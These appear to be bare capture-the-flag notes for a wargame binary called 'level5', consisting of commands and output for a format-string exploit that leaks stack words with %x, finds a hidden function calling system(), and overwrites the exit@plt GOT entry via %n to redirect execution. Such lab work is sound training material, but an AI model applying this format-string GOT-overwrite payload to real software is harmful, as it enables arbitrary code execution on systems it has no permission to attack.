
python -c "print('a' * 50 +  20 * ' %x')" > /tmp/sol5

cat /tmp/sol5 - | ./level5
    -> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 200 b7fd1ac0 b7ff37d0 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 25206161 78252078 20782520 25207825 78252078

objdump -d -Mintel level5 
    080484a4 <o>:
     80484a4:       55                      push   ebp
     80484a5:       89 e5                   mov    ebp,esp
     80484a7:       83 ec 18                sub    esp,0x18
     80484aa:       c7 04 24 f0 85 04 08    mov    DWORD PTR [esp],0x80485f0
     80484b1:       e8 fa fe ff ff          call   80483b0 <system@plt>
     80484b6:       c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1
     80484bd:       e8 ce fe ff ff          call   8048390 <_exit@plt>

    080483d0 <exit@plt>:
     80483d0:       ff 25 38 98 04 08       jmp    DWORD PTR ds:0x8049838
     80483d6:       68 28 00 00 00          push   0x28
     80483db:       e9 90 ff ff ff          jmp    8048370 <_init+0x3c>


     080484a4 = 134513828 

python -c "print('\x38\x98\x04\x08' + '%134513824x' + '%4\$n')" > /tmp/sol5

cat /tmp/sol5 - | ./level5